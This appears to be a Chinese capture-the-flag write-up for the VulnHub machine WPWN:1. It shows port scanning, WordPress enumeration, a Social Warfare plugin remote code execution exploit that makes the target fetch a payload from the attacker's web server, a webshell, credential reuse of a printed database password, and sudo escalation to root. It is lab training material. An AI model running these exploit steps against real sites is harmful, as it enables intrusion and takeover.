wpwn: 1

考点:dirsearch,wordpress,sudo

靶机链接: https://www.vulnhub.com/entry/wpwn-1,537/

环境配置 #

名称IP
Kali Linux10.0.2.24
WPWN-110.0.2.39

初步打点 #

端口扫描 #

$ export rip=10.0.2.39
$ sudo nmap -v -A -p- $rip
PORT   STATE SERVICE VERSION
22/tcp open  ssh     OpenSSH 7.9p1 Debian 10+deb10u2 (protocol 2.0)
| ssh-hostkey: 
|   2048 59:b7:db:e0:ba:63:76:af:d0:20:03:11:e1:3c:0e:34 (RSA)
|   256 2e:20:56:75:84:ca:35:ce:e3:6a:21:32:1f:e7:f5:9a (ECDSA)
|_  256 0d:02:83:8b:1a:1c:ec:0f:ae:74:cc:7b:da:12:89:9e (ED25519)
80/tcp open  http    Apache httpd 2.4.38 ((Debian))
| http-methods: 
|_  Supported Methods: GET POST OPTIONS HEAD
|_http-title: Site doesn't have a title (text/html).
|_http-server-header: Apache/2.4.38 (Debian)

WEB测试 #

dirsearch #

发现wordpress目录,看来是搞wordpress了

1

wpscan #

$ wpscan --url http://10.0.2.39/wordpress --api-token ******************************************* -e

2

参考 WordPress Plugin Social Warfare < 3.5.3 - Remote Code Execution

获得权限 #

getwebshell #

kali上开web服务

$ python -m 'http.server' 80

3

$ python2  46794.py -t http://10.0.2.39/wordpress/ -p http://10.0.2.24/CVE/CVE-2019-9978

执行后访问shell地址返回200,使用antsword连接成功

3

用户权限 #

查看wordpress数据库配置

4

获得密码R3&]vzhHmMn9,:-5

查看/home文件夹发现用户 takis

5

登录成功

提权 #

6

获得root权限

彩蛋 #

这里root.txt找flag的过程中发现还有个彩蛋

7

关联 vulnhub515

Previous pyexp: 1 Loly: 1 Next